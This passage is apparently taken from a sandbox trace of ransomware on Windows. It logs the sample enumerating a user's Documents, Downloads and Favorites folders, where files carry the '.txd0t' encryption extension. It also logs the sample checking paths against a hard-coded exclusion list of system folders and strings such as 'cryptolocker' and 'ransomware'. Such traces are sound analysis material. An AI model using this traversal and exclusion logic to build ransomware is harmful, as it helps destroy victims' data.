y2TBjiEU\\_HV0qcp0pks" [0129.555] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.555] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="iTea.pptx.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t" [0129.555] PathFindExtensionW (pszPath="iTea.pptx.txd0t") returned=".txd0t" [0129.555] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.555] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf065b200, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xdee60400, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x113d8, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="PoJjjS_vt-KW.doc.txd0t", cAlternateFileName="POJJJS~1.TXD")) returned 1 [0129.555] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2=".") returned 1 [0129.555] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2="..") returned 1 [0129.555] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.555] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.555] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="PoJjjS_vt-KW.doc.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t" [0129.555] PathFindExtensionW (pszPath="PoJjjS_vt-KW.doc.txd0t") returned=".txd0t" [0129.555] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.555] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f46e60, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0xe5bb2500, ftLastAccessTime.dwHighDateTime=0x1d5eff9, ftLastWriteTime.dwLowDateTime=0x51afc2f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x184b4, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="RcZvqUQNfrhT.rtf.txd0t", cAlternateFileName="RCZVQU~1.TXD")) returned 1 [0129.556] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2=".") returned 1 [0129.556] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2="..") returned 1 [0129.556] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="RcZvqUQNfrhT.rtf.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t" [0129.556] PathFindExtensionW (pszPath="RcZvqUQNfrhT.rtf.txd0t") returned=".txd0t" [0129.556] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.556] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f6cca00, ftCreationTime.dwHighDateTime=0x1d5e63f, ftLastAccessTime.dwLowDateTime=0x600cb1a0, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f1b, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tPNskvgoa.ots.txd0t", cAlternateFileName="TPNSKV~1.TXD")) returned 1 [0129.556] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2=".") returned 1 [0129.556] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2="..") returned 1 [0129.556] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tPNskvgoa.ots.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t" [0129.556] PathFindExtensionW (pszPath="tPNskvgoa.ots.txd0t") returned=".txd0t" [0129.556] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.556] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d732c0, ftCreationTime.dwHighDateTime=0x1d5ec83, ftLastAccessTime.dwLowDateTime=0xed8ee220, ftLastAccessTime.dwHighDateTime=0x1d5e974, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcfaa, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tYF1BO7xWTgAbs uk76.csv.txd0t", cAlternateFileName="TYF1BO~1.TXD")) returned 1 [0129.556] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2=".") returned 1 [0129.556] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2="..") returned 1 [0129.556] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tYF1BO7xWTgAbs uk76.csv.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t" [0129.556] PathFindExtensionW (pszPath="tYF1BO7xWTgAbs uk76.csv.txd0t") returned=".txd0t" [0129.556] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.556] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 1 [0129.556] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2=".") returned 1 [0129.556] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2="..") returned 1 [0129.556] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.556] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="vTQY5QAfnqPKv2th.odt.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t" [0129.556] PathFindExtensionW (pszPath="vTQY5QAfnqPKv2th.odt.txd0t") returned=".txd0t" [0129.556] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.556] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 0 [0129.557] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0129.557] GetProcessHeap () returned 0xe30000 [0129.557] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x680dae8 | out: hHeap=0xe30000) returned 1 [0129.557] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 0 [0129.557] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0129.557] GetProcessHeap () returned 0xe30000 [0129.557] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.557] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 0 [0129.557] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.557] GetProcessHeap () returned 0xe30000 [0129.557] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.557] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 0 [0129.557] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.557] GetProcessHeap () returned 0xe30000 [0129.557] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.557] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0129.557] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0129.557] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0129.557] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.557] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.557] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0129.557] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0129.557] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.557] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0129.557] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="crypt_detect") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="cryptolocker") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="ransomware") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.558] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0129.558] GetProcessHeap () returned 0xe30000 [0129.558] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.558] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0129.558] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Downloads\\*") returned="C:\\Users\\FD1HVy\\Downloads\\*" [0129.558] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.559] StrCmpW (psz1=".", psz2=".") returned 0 [0129.559] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.559] StrCmpW (psz1="..", psz2=".") returned 1 [0129.559] StrCmpW (psz1="..", psz2="..") returned 0 [0129.559] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.559] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.559] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.559] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44137e3b, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44137e3b, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.559] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.559] GetProcessHeap () returned 0xe30000 [0129.559] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.559] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4499d75, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0129.559] StrCmpW (psz1="Favorites", psz2=".") returned 1 [0129.559] StrCmpW (psz1="Favorites", psz2="..") returned 1 [0129.559] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.559] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.559] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Favorites", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Favorites") returned="C:\\Users\\FD1HVy\\Favorites" [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system32\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\system\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\local\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\boot\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\perflogs\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\programdata\\") returned 0x0 [0129.559] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\drivers\\") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\wsus\\") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.560] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Favorites", lpSrch="crypt_detect") returned 0x0 [0129.560] StrStrIW 